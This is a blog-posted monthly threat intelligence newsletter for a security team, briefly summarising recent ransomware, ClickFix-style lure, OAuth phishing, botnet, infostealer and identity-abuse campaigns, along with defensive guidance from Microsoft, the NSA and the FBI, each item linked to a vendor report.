• Explore
  • Blog
  • Podcast
  • Community
  • About
  • Services
  • Contact
Menu

Exploring Information Security

Securing the Future - A Journey into Cybersecurity Exploration
  • Explore
  • Blog
  • Podcast
  • Community
  • About
  • Services
  • Contact

February 2026 - ExploreSec Cybersecurity Threat Intelligence Newsletter

February 16, 2026

This is a newsletter I create and share with my internal security team. Feel free to grab and do the same.

CrazyHunter Ransomware’s Stealth Tactics and Attack Chain 

Researchers have analyzed CrazyHunter, an evolving ransomware strain that combines stealthy evasion techniques with aggressive lateral movement. The ransomware disables security controls early in the attack chain, spreads across enterprise environments, and encrypts data using strong cryptography, making detection and recovery difficult. 

Key Insights 

  • Initial access is often gained through weak Active Directory credentials, followed by lateral movement using Group Policy abuse. 

  • The ransomware uses bring-your-own-vulnerable-driver techniques to terminate security tools and evade detection. 

  • Multi-stage execution disables defenses before loading the ransomware payload, including in-memory execution to avoid disk artifacts. 

  • Hybrid encryption is used to lock victim data and protect encryption keys. 

  • Victims are pressured through data leak threats and direct extortion tactics. 

Further Reading: Trellix 

 

 

Sophisticated ClickFix Campaign Targeting the Hospitality Sector 

A recent phishing campaign has been observed targeting the hospitality industry with a refined version of the ClickFix social-engineering technique. In this variant, victims are presented with what appears to be a routine human-verification prompt or CAPTCHA, but the displayed “fix” instructions lead them to execute commands on their systems. Once executed, these commands deploy remote-access malware that gives attackers control over endpoints, enabling credential theft, data exfiltration, or further malicious activity. Because the campaign leverages familiar prompts and trusted branding, users may be more likely to follow the steps without suspecting foul play. 

Key Insights 

  • Attackers are tailoring ClickFix lures to the hospitality sector’s workflows and terminology. 

  • The campaign uses fake verification prompts that instruct victims to run benign-looking commands. 

  • Executing these commands installs remote-access malware that compromises devices. 

  • Social engineering remains a powerful vector when paired with familiar user interactions. 

Further Reading: SecurityWeek 

 

 

Analyzing PhaltBlyx: Fake BSODs and Trusted Build Tools Used to Construct a Malware Infection 

Researchers have dissected a malware campaign involving PhaltBlyx, a deceptive infection method that combines social engineering with abuse of trusted development tools and fake system prompts. In this technique, victims encounter what appears to be a Blue Screen of Death (BSOD) or other alarming system error. Instead of indicating a real crash, the fake BSOD is used to convince the user to run repair or diagnostic tools — including legitimate build tools — that have been co-opted to execute malicious scripts. Once launched, these components pull additional payloads and establish persistence, often evading traditional security defenses because they’re routed through trusted binaries. 

Key Insights 

  • Fake system errors like bogus BSODs are used to create urgency and lower user skepticism. 

  • Attackers abuse trusted development/build tools to execute malicious scripts, making detection harder. 

  • Once executed, these scripts fetch and deploy additional malware components. 

  • Using legitimate tools helps the infection evade security controls that trust known binaries. 

Further Reading: Securonix 

 

 

Cyber Criminal Ecosystem Analysis 

Researchers have mapped the modern cyber criminal ecosystem, revealing how threat actors operate with increasing organization and specialization. Instead of lone attackers working in isolation, today’s underground economy functions more like a service industry — with distinct roles and marketplaces for phishing kits, malware, access brokers, and human-based attack services. This division of labor allows even low-skilled attackers to launch sophisticated campaigns by purchasing tools, infrastructure, or privileged access from others. Understanding this ecosystem helps defenders anticipate how capabilities and services evolve and how attacks scale. 

Key Insights 

  • The cyber criminal ecosystem now resembles a service economy with specialized roles and offerings. 

  • Tool-and-infrastructure marketplaces lower the barrier to entry for new attackers. 

  • Access brokers sell privileged access and footholds, enabling rapid exploitation. 

  • Services like phishing-as-a-service and malware distribution are commoditized. 

  • Human-based services (e.g., social-engineering or insider collaboration) are part of the overall attack chain. 

Further Reading: Push Security 

 

 

VoidLink: Cloud-Native Malware Framework Weaponizing Linux Infrastructure  

Researchers have identified VoidLink, a cloud-native malware framework built specifically for Linux environments running in modern cloud infrastructure. Unlike traditional malware adapted for cloud use, VoidLink is designed from the ground up to operate in virtual machines, containers, and orchestration platforms. Its modular architecture allows operators to extend functionality while maintaining stealth, enabling long-term access and post-compromise activity across cloud workloads. 

Key Insights 

  • VoidLink is purpose-built for cloud-native Linux environments, including virtualized and containerized infrastructure. 

  • A modular plug-in architecture allows operators to tailor capabilities such as reconnaissance, persistence, and lateral movement. 

  • The framework can identify cloud environments and adapt its behavior to blend in with legitimate activity. 

  • Stealth and anti-analysis techniques are used to reduce detection and support long-term operations. 

  • The design suggests a well-resourced threat focused on cloud and infrastructure-level compromise. 

Further Reading: Check Point Research 

 

 

ConsentFix Debrief: Browser-Native OAuth Phishing  

The ConsentFix debrief outlines a phishing technique that abuses legitimate OAuth consent flows to compromise accounts without stealing passwords or bypassing MFA. Instead of traditional credential harvesting, attackers trick victims into approving application access through a browser-based workflow, granting access tokens tied to trusted applications. This approach allows attackers to blend malicious activity into normal authentication behavior, making detection more difficult in enterprise identity environments. 

Key Insights 

  • ConsentFix abuses legitimate OAuth consent flows rather than harvesting credentials. 

  • Attacks operate entirely within the browser, avoiding many endpoint and email-based detections. 

  • MFA is ineffective in this scenario because authentication occurs through a valid authorization process. 

  • Targeting trusted or first-party applications helps attackers evade default access controls. 

  • The technique reflects a shift toward identity-layer abuse rather than traditional phishing kits. 

Further Reading: Push Security 

 

 

CrashFix Browser Extension Campaign Delivers ModeloRAT  

Researchers identified a campaign linked to the threat actor KongTuke that uses a malicious browser extension to compromise systems. The extension poses as a legitimate utility, such as an ad blocker, but is designed to intentionally destabilize the browser. Victims are then presented with fake error messages that guide them into executing attacker-controlled commands, ultimately leading to the installation of a remote-access Trojan. 

Key Insights 

  • The attack relies on a malicious browser extension disguised as a legitimate tool. 

  • The extension deliberately crashes the browser to prompt user interaction. 

  • Victims are socially engineered into running commands that install additional malware. 

  • Corporate, domain-joined systems are targeted with more advanced payloads. 

  • The technique combines social engineering with browser abuse rather than traditional phishing links. 

Further Reading: Huntress 

 

 

Microsoft Remains the Most Imitated Brand in Phishing Attacks in Q4 2025 

Check Point Research reports that Microsoft continued to be the most frequently impersonated brand in phishing attacks during Q4 2025. Attackers consistently leverage trusted, widely used brands to increase the likelihood of user interaction and credential compromise, particularly for access to email, cloud services, and productivity platforms. Technology companies remain the most attractive targets due to the value of associated identities and accounts. 

Key Insights 

  • Microsoft accounted for the largest share of brand-based phishing attempts in Q4 2025. 

  • Technology brands dominate phishing campaigns due to their broad user bases and access value. 

  • Other commonly impersonated brands included Google, Amazon, Apple, and Meta. 

  • Phishing lures often rely on realistic branding and subtle impersonation techniques to appear legitimate. 

Further Reading: Check Point Research 

 

 

Open-Source Python Script Drives Social Media Phishing Campaign 

Threat researchers identified a phishing campaign leveraging social media direct messages to distribute malicious files that ultimately lead to remote access trojan deployment. The activity relies on weaponized archives, DLL sideloading, and a legitimate open-source Python script to execute payloads while blending in with normal software behavior. The campaign highlights how threat actors are expanding beyond email to exploit trust within professional networking platforms. 

Key Insights 

  • Social media direct messages are being used as a primary delivery mechanism, allowing attackers to bypass traditional email security controls. 

  • The infection chain abuses DLL sideloading with legitimate applications and a portable Python environment to execute malicious activity. 

  • Use of an open-source Python script reduces development effort while complicating detection by appearing benign. 

  • Post-execution behavior indicates persistence and command-and-control communication consistent with remote access tooling. 

  • Targeting suggests a focus on corporate users, where social engineering via trusted platforms increases engagement. 

Further Reading: ReliaQuest 

 

 

Payroll Diversion via Help Desk Social Engineering 

Threat researchers analyzed an incident in which attackers used phone-based social engineering to manipulate help desk workflows and redirect employee payroll to attacker-controlled bank accounts. By impersonating employees and exploiting weak identity verification processes, the adversary reset credentials, re-registered multi-factor authentication devices, and modified payroll details without exploiting technical vulnerabilities. The activity demonstrates how human-focused tactics can enable financial fraud while evading traditional security controls. 

Key Insights 

  • The attack relied on voice-based impersonation of employees to bypass help desk authentication procedures. 

  • Publicly available personal details were used to satisfy challenge-response questions and gain account access. 

  • Credential resets and MFA re-enrollment enabled control over payroll, HR, and IT-related systems. 

  • Payroll redirection remained undetected until employees reported missing paychecks. 

  • The intrusion exposed gaps in identity change monitoring and cross-departmental alerting. 

Further Reading: Unit 42 

 

 

AI-Powered HTMLMIX Obfuscation Tool Reshapes Phishing Tactics 

Threat researchers analyzed HTMLMIX, an AI-enabled phishing obfuscation platform actively used to generate large volumes of unique phishing emails. The tool automates HTML code transformation and content variation to undermine signature-based detection, enabling attackers to scale phishing campaigns while maintaining high delivery success. This activity reflects a broader shift toward AI-assisted automation within phishing operations. 

Key Insights 

  • HTMLMIX programmatically alters HTML structure to produce thousands of distinct email variants from a single template. 

  • Automated obfuscation techniques include layout restructuring, CSS manipulation, and hidden character insertion to evade pattern-based detection. 

  • AI-driven content features introduce language variation, preview text changes, and fabricated email threads to increase realism. 

  • API-based workflows allow the tool to integrate directly into phishing delivery pipelines for rapid campaign scaling. 

  • Short-lived redirect infrastructure is used to mask malicious destinations and improve initial deliverability. 

Further Reading: Abnormal AI 

 

 

Fake CAPTCHA Pop-Ups Used to Trick Website Visitors 

A campaign known as ClearFake is using compromised websites to display fake verification pop-ups that look like routine security checks. These prompts guide visitors through simple steps that appear harmless but actually trigger hidden commands on their computers. Because the scam appears on real, trusted websites, it can be difficult for everyday users to recognize what’s happening. 

Key Points 

  • Legitimate websites are being altered to display fake verification messages. 

  • The pop-ups instruct users to perform basic actions that quietly run harmful commands. 

  • Familiar technology and services are used to make the activity seem normal. 

  • Once the commands run, additional unwanted software can be installed without clear warning. 

  • The use of trusted websites and common prompts increases the likelihood of user interaction. 

Further Reading: Expel 

 

 

2026 Threat Forecast: Top Cyberattacks Set to Increase Enterprise Exposure 

Email remains the primary entry point for attackers, and emerging campaigns are increasingly focused on exploiting trust, identity, and routine workflows to bypass defenses. Threat actors are layering social engineering techniques with technical evasion methods to increase success rates and reduce detection, signaling a continued shift toward human-centric attack vectors. 

Key Insights 

  • Attackers are refining multi-stage phishing workflows (e.g., QR codes and vendor impersonation) to condition targets and evade security controls. 

  • Social engineering remains central, with threat actors embedding themselves in legitimate communication threads to increase credibility. 

  • Look-alike domains, branding mimicry, and personalized phishing pages are becoming more common to improve credential theft success. 

  • Email continues to be the most reliable initial access vector due to its ubiquity and reliance on human interaction. 

Further Reading: Abnormal AI 

 

 

Real-Time Malicious JavaScript Generated Through LLMs 

Threat researchers identified a technique where attackers use large language models to generate malicious JavaScript code in real time inside a victim’s browser. Instead of hosting harmful code on attacker-controlled infrastructure, the webpage dynamically requests code generation during the visit, producing phishing functionality only at execution time. This approach makes the activity harder to detect because the malicious content does not exist until the moment it runs. 

Key Insights 

  • Malicious JavaScript is generated dynamically during page visits rather than being stored on a server. 

  • Each execution produces unique code, reducing the effectiveness of signature-based detection. 

  • Requests to trusted LLM service domains can blend in with normal web traffic. 

  • The technique enables phishing pages to be customized in real time based on victim context. 

  • Detection becomes more difficult because the malicious logic exists only briefly in the browser. 

Further Reading: Unit 42 

 

 

Phishing Messages Masquerade as Collaboration Platform Invites 

A phishing campaign is abusing trusted collaboration platform notifications to deliver scam messages that look like legitimate invitations. By using real platform features, the messages appear routine and familiar, increasing the chances that recipients engage without questioning them. Instead of pushing malicious links, the messages often steer people toward fake support interactions. 

Key Points 

  • Legitimate collaboration platform features are being used to send deceptive invitations. 

  • Messages are designed to look like normal work notifications, such as billing or subscription alerts. 

  • Some scams avoid links entirely and instead prompt users to contact fraudulent support numbers. 

  • The volume of messages is high, affecting users across many organizations. 

  • Familiar workplace tools are being leveraged to make scams feel routine and trustworthy. 

Further Reading: Check Point 

 

 

Kimwolf Botnet Embedded in Corporate and Government Networks 

Threat researchers reported widespread activity tied to the Kimwolf botnet, which has infected millions of internet-connected devices and is now appearing inside corporate and government environments. Once embedded, compromised devices can be used to relay malicious traffic, participate in large-scale denial-of-service activity, and scan internal networks for additional targets. The presence of consumer-grade devices inside enterprise environments is expanding the botnet’s reach beyond its original footprint. 

Key Insights 

  • Kimwolf primarily spreads through compromised internet-connected devices, including consumer hardware. 

  • Infected systems are used to generate large volumes of malicious traffic and denial-of-service activity. 

  • Once inside an organization, compromised devices can scan internal networks for other reachable systems. 

  • Residential proxy infrastructure is leveraged to mask command-and-control activity. 

  • The botnet’s scale and persistence indicate continued risk despite partial disruption efforts. 

Further Reading: KrebsOnSecurity 

 

 

Infostealer Data Cache Exposes 149 Million Credentials 

Threat researchers identified a large, publicly accessible database containing roughly 149 million stolen login credentials. The data was collected by infostealer malware that silently harvests usernames and passwords from infected devices and aggregates them for later use. Because the database was left exposed without protection, the credentials could be accessed and abused for large-scale account takeover, fraud, and follow-on intrusion activity. 

Key Insights 

  • The dataset contained approximately 149 million unique username and password combinations. 

  • Infostealer malware was the likely source, collecting credentials directly from compromised endpoints. 

  • Exposed credentials spanned a wide range of services, including email, financial platforms, and consumer accounts. 

  • Some entries were associated with corporate, government, and educational domains, increasing targeting risk. 

  • The unsecured database remained accessible long enough to pose a meaningful risk of reuse by other threat actors. 

Further Reading: ExpressVPN 

 

 

Multi-Stage AiTM Phishing and BEC Campaign Abusing SharePoint 

Threat researchers uncovered a coordinated campaign that combines adversary-in-the-middle phishing with business email compromise techniques. The activity abuses trusted cloud collaboration services to deliver phishing lures, steal session data, and expand access once an initial account is compromised. By leveraging familiar internal workflows, the attackers were able to spread both inside and outside targeted organizations. 

Key Insights 

  • Phishing lures were designed to look like legitimate SharePoint document shares from trusted senders. 

  • Stolen credentials and session tokens allowed attackers to bypass standard login protections. 

  • Malicious inbox rules were created to hide follow-on activity and maintain access. 

  • Compromised accounts were used to send additional phishing messages to internal and external contacts. 

  • The campaign demonstrates how trusted collaboration platforms can be misused to scale email compromise. 

Further Reading: Microsoft Security Blog 

 

 

Fake CAPTCHA Prompts Used to Trick Users Into Installing Malware 

Researchers have identified a scam that uses fake “CAPTCHA” verification screens to deceive users into installing malicious software. Instead of a simple checkbox, these prompts instruct people to copy and run a command on their own device, which secretly launches malware designed to steal sensitive information. Because the steps look like a normal verification process, many users don’t realize anything is wrong until after their system is compromised. 

Key Points 

  • Fake CAPTCHA pages instruct users to manually run commands as part of a supposed verification step. 

  • Following these instructions can silently install malware on the device. 

  • The malware is designed to collect sensitive data such as saved passwords and browser information. 

  • Trusted system tools are abused to make the activity look legitimate. 

  • The attack relies heavily on user interaction, making it harder to spot at first glance. 

Further Reading: Blackpoint Cyber 

 

 

Scam Emails Abuse a Real Microsoft Address 

Scammers are sending fraudulent emails that appear to come from a legitimate Microsoft notification address, making the messages look trustworthy at first glance. Because these emails originate from a real Microsoft service that some organizations allow by default, they can slip past spam filters and land directly in inboxes. The messages often claim an urgent issue, such as an unexpected charge, and push recipients to take immediate action. 

Key Points 

  • Scam messages are being sent from a real Microsoft notification address. 

  • The emails are designed to look authentic and bypass some email filters. 

  • Messages often create urgency by claiming billing or account problems. 

  • Recipients may be directed to call a phone number controlled by scammers. 

  • Trusted services can be abused to make scams more convincing. 

Further Reading: Ars Technica 

 

 

Detection and Response Are Moving Beyond the Endpoint 

Security teams are reassessing the limits of traditional endpoint detection and response (EDR) tools as more attacks avoid touching the operating system altogether. Modern threat activity increasingly unfolds inside browsers and cloud applications, where users authenticate, access data, and perform daily work. This shift is driving interest in detection and response capabilities that extend beyond endpoints to cover browser-based attack paths. 

Key Insights 

  • EDR remains effective for threats that execute directly on a device, such as malware and suspicious process activity. 

  • Many modern attacks operate entirely within browsers, targeting credentials, sessions, and cloud access. 

  • Browser-based phishing, session hijacking, and token theft may generate little or no endpoint telemetry. 

  • Attackers are adapting to where users work, focusing on identity and access rather than device compromise. 

  • Security strategies are increasingly combining endpoint visibility with browser-level detection. 

Further Reading: Push Security 

 

 

TA584 Continues to Evolve Its Initial Access Playbook 

Threat researchers report that the activity cluster tracked as TA584 continues to adapt how it gains initial access to victim environments. The group remains highly active, cycling through new email lures, delivery techniques, and malware families to keep campaigns effective. This ongoing evolution highlights how initial access operations are becoming more flexible and harder to disrupt through static defenses alone. 

Key Insights 

  • TA584 operates as a high-volume initial access actor with frequent changes to campaign themes and infrastructure. 

  • Email remains the primary delivery method, with lures tailored to specific regions, brands, or current events. 

  • Campaigns increasingly rely on redirection chains and customized landing pages to drive user interaction. 

  • The actor rotates malware families, including remote access tools that can enable follow-on activity such as ransomware. 

  • Rapid campaign turnover reduces the effectiveness of signature-based and content-only detections. 

Further Reading: Proofpoint 

 

 

IClickFix Framework Abuses Compromised WordPress Sites to Deliver Malware 

Threat researchers have identified a large-scale malicious framework known as IClickFix that leverages compromised WordPress websites to distribute malware. Visitors to affected sites may be presented with deceptive verification prompts designed to trick them into manually executing commands on their own systems. This approach combines widespread infrastructure abuse with social engineering to infect victims at scale. 

Key Insights 

  • IClickFix injects malicious scripts into compromised WordPress sites to redirect visitors to deceptive prompts. 

  • Victims are shown fake CAPTCHA-style challenges that instruct them to copy and run commands. 

  • Executing these commands leads to malware installation without exploiting a software vulnerability. 

  • The framework has been active for months and has impacted thousands of websites globally. 

  • Delivered payloads include tools that enable persistent remote access to infected systems. 

Further Reading: SEKOIA Blog 

 

 

Windows Moves Toward Disabling NTLM Authentication by Default 

Microsoft is advancing plans to reduce reliance on the legacy NTLM authentication protocol by disabling it by default in future Windows releases. NTLM has long been used as a fallback mechanism, but its design exposes environments to well-known attack techniques. The shift reflects a broader move toward modern, identity-centric authentication models across Windows ecosystems. 

Key Insights 

  • NTLM is considered a legacy protocol with known weaknesses that attackers can exploit. 

  • Future Windows versions will favor modern authentication methods such as Kerberos. 

  • Microsoft is taking a phased approach to help organizations identify and reduce NTLM usage. 

  • New authentication capabilities are being introduced to cover scenarios where NTLM was historically required. 

  • NTLM will remain available for legacy compatibility but must be explicitly enabled. 

Further Reading: Microsoft Tech Community 

 

 

NSA Releases Initial Zero Trust Implementation Guidelines 

The U.S. National Security Agency has released the first set of guidance in a new series aimed at helping organizations implement zero trust principles in a structured, practical way. These initial materials focus on establishing visibility and understanding of environments before moving into enforcement, providing a foundation for more mature zero trust capabilities over time. 

Key Insights 

  • The first releases introduce a primer and a discovery-focused phase to help organizations map assets, data, services, and access patterns. 

  • Emphasis is placed on understanding the environment before applying controls or policy enforcement. 

  • The guidance is modular, allowing organizations to adopt elements based on their maturity and priorities. 

  • Later phases are expected to build on this foundation with more detailed implementation activities. 

  • While developed with government use cases in mind, the guidance is applicable to broader enterprise zero trust efforts. 

Further Reading: NSA 

 

 

TA584 Continues to Evolve Initial Access Tactics 

Threat researchers report that the activity cluster tracked as TA584 continues to adapt how it gains initial access to victim environments. This actor is highly active, rotating email lures, delivery techniques, and malware families to keep campaigns effective and harder to block. The ongoing evolution highlights how initial access operations are becoming more adaptable and challenging for defenses that rely on static indicators. 

Key Insights 

  • TA584 operates as a high-volume initial access actor with frequent changes to campaign themes and infrastructure. 

  • Email remains the primary delivery method, with lures tailored to specific regions, brands, or events to increase engagement. 

  • Campaigns often use redirection chains and customized landing pages to encourage interaction while bypassing security filters. 

  • The group cycles through multiple malware types, including remote access tools that can facilitate follow-on compromise. 

  • Rapid campaign turnover reduces the effectiveness of signature-based and content-only detection techniques. 

Further Reading: Proofpoint 

 

 

FBI Launches Operation Winter SHIELD to Boost Cyber Resilience 

The FBI has introduced Operation Winter SHIELD, a nationwide initiative focused on strengthening cyber resilience across public and private organizations. Drawing directly from real-world investigations, the effort highlights common weaknesses attackers exploit and outlines practical defensive actions aimed at reducing exposure to both criminal and state-linked cyber activity. 

Key Insights 

  • Operation Winter SHIELD distills lessons learned from FBI cyber investigations into a concise set of high-impact actions. 

  • The initiative focuses on reducing common attack paths used in ransomware, espionage, and disruptive campaigns. 

  • Recommendations span identity protection, system hardening, and improved visibility across IT and operational technology environments. 

  • The campaign emphasizes proactive preparation rather than reactive incident response. 

  • Winter SHIELD supports broader efforts to improve national cyber resilience through public–private collaboration. 

Further Reading: FBI 

 

 

Fake Dropbox Emails Used to Steal Login Details 

Attackers are circulating phishing emails that impersonate Dropbox and attempt to trick recipients into handing over their account credentials. The messages often look like routine business communications and include a PDF attachment. When opened, the document directs the user to a fake Dropbox login page designed to capture usernames and passwords. 

Key Points 

  • Phishing emails are crafted to look like legitimate Dropbox notifications or file-sharing messages. 

  • PDF attachments are used to make the email appear business-related and trustworthy. 

  • Links inside the document lead to counterfeit login pages. 

  • Entered credentials are captured by attackers and can be reused to access other accounts. 

  • The technique relies on familiar brands and file formats to lower suspicion. 

Further Reading: CybersecurityNews 

 

 

ShinyHunters-Linked Attacks Target SaaS Environments 

Threat intelligence analysis highlights how activity associated with the ShinyHunters cybercrime ecosystem is increasingly focused on compromising software-as-a-service environments. Rather than exploiting technical vulnerabilities, these campaigns rely on social engineering and identity abuse to gain access to cloud platforms, allowing attackers to move laterally across connected services and exfiltrate sensitive data for extortion. 

Key Insights 

  • ShinyHunters-linked operations rely heavily on phishing and voice-based social engineering to steal SSO credentials and MFA codes. 

  • Once identities are compromised, attackers abuse trust relationships to access multiple SaaS applications. 

  • These attacks are identity-centric and often leave little traditional endpoint evidence. 

  • Stolen credentials and session access enable large-scale data theft without exploiting software flaws. 

  • Identity visibility and rapid response are critical to limiting impact once access is gained. 

Further Reading: Google Cloud 

 

 

SLH Campaign Blends Vishing With AiTM Phishing for Account Takeover 

Threat researchers analyzed a recent campaign attributed to the group tracked as SLH that combines live phone-based social engineering with adversary-in-the-middle phishing. Attackers initiate contact by posing as internal IT support, then guide victims to a phishing site designed to capture credentials, MFA codes, and active session tokens. With this access, the actors can move quickly across connected cloud services using the victim’s identity. 

Key Insights 

  • The campaign starts with phone calls impersonating IT staff to establish trust. 

  • Victims are steered to a phishing site that captures credentials and MFA in real time. 

  • Stolen session tokens enable immediate access to SSO-protected services. 

  • The hybrid vishing-plus-phishing approach increases success and evasion. 

  • Identity abuse allows attackers to expand access without deploying malware. 

Further Reading: Push Security 

 

In News Tags newsletter
February 2026 - ExploreSec Cybersecurity Awareness Newsletter →

Latest PoDCASTS

Featured
Feb 17, 2026
What are the AI Vulnerabilities We Need to Worry About
Feb 17, 2026
Feb 17, 2026
Feb 10, 2026
[RERELEASE] How to make time for a home lab
Feb 10, 2026
Feb 10, 2026
Feb 3, 2026
[RERELEASE] How to build a home lab
Feb 3, 2026
Feb 3, 2026
Jan 27, 2026
How to Build an AI Governance Program with Walter Haydock
Jan 27, 2026
Jan 27, 2026
Jan 20, 2026
Exploring Cribl: Sifting Gold from Data Noise for Cost and Security
Jan 20, 2026
Jan 20, 2026
Jan 13, 2026
What is BSides ICS?
Jan 13, 2026
Jan 13, 2026
Jan 6, 2026
Cybersecurity Career Panel: Transitioning from Technical to Leadership
Jan 6, 2026
Jan 6, 2026
Dec 30, 2025
What is React2Shell (CVE-2025-55182)?
Dec 30, 2025
Dec 30, 2025
Dec 23, 2025
[RERELEASE] What is application security?
Dec 23, 2025
Dec 23, 2025
Dec 16, 2025
The Final Frontier of Security: The State of Space Security with Tim Fowler
Dec 16, 2025
Dec 16, 2025

Powered by Squarespace